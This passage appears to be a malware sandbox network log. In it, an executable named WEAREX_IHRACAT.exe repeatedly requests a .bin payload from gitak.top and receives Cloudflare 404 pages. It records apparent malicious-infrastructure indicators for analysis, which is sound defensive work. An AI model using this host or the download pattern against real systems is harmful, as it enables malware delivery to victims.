                        2024-08-29 10:41:21 UTC1369INData Raw: 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61
                        Data Ascii: : 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fa
                        2024-08-29 10:41:21 UTC920INData Raw: 38 36 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31
                        Data Ascii: 86-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 1
                        2024-08-29 10:41:21 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.11.2049783172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:31 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:31 UTC691INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 73
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xhKipF4ZA8%2Bkvdd%2BU1F%2BrBg4eynZTN%2BjBDWj9bgfGgH%2BilT3MDXaYBqPidLk%2BHIjGpOJ1KV5XU%2BxKhXjAr%2FlM%2FPDMyPa%2BmW65B7puXv5TX78IU5IOvcZbn8wsk%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babedddcc3059df-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:31 UTC678INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:41:31 UTC1369INData Raw: 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61
                        Data Ascii: bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-na
                        2024-08-29 10:41:31 UTC926INData Raw: 33 36 20 35 2e 32 38 36 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31
                        Data Ascii: 36 5.286-2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 1
                        2024-08-29 10:41:31 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.11.2049784172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:42 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:42 UTC677INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 84
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EoNQvU%2F68bPKsSQUFFONu8irGKTbWrh9ZiAyCeTfaGqzkT7pMFpOm5qS5cv%2BpGcO9DD5iqwclNCCrU5vtum1PhltMVpXIYst3f8%2BQdM1rJzMTQXGTSBbOxZT56Q%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babee1f886782ec-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:42 UTC692INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:41:42 UTC1369INData Raw: 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:41:42 UTC912INData Raw: 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.6
                        2024-08-29 10:41:42 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.11.2049785172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:41:52 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:41:52 UTC677INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:41:52 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 94
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hwkKcTa3VXkc7R9rQYkkb4eqPmY8q4UzebAK8gzZsZ4XJBRVEUF19Zbfu0H4L7Gp15nI4QJZ7M5%2F%2Fm8bIekDe9NEAW9JWIima4oQgcnbn1Gr3bjWeb6%2F2hGaJTo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babee614a62c968-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:41:52 UTC692INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:41:52 UTC1369INData Raw: 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09
                        Data Ascii: margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:41:52 UTC911INData Raw: 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36
                        Data Ascii: 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.6
                        2024-08-29 10:41:52 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.11.2049786172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:03 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:03 UTC680INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 105
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=13eTPd51Zx4b9EW4xNYd4Zei8NPIGF4uqYtQUC%2BvF7tiLZ45S6fm%2B4M7DPeBk7meYNsqfYwxRKlb%2BQqUwjx4TJBXNlEP7Z%2FylcPwqo20X09H0aQMyGuOzkdWb64%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babeea32f3d061c-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:03 UTC689INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:42:03 UTC1369INData Raw: 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b
                        Data Ascii: x;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;
                        2024-08-29 10:42:03 UTC915INData Raw: 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63
                        Data Ascii: 353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c
                        2024-08-29 10:42:03 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.11.2049787172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:42:13 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:42:13 UTC680INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:42:13 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 115
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqmBalLXHAr8qRHykb93s7Lp50lREcKDyK8n%2Bv3wMBlsq8eWm%2FglNpbgr71VKPXaN9RNmJINX9aly%2FjGoZjXd5KoUWa3uB7RDsG05r8TwF7mWPTyTmQB3N%2Fsh6c%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babeee4daa80854-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:42:13 UTC689INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
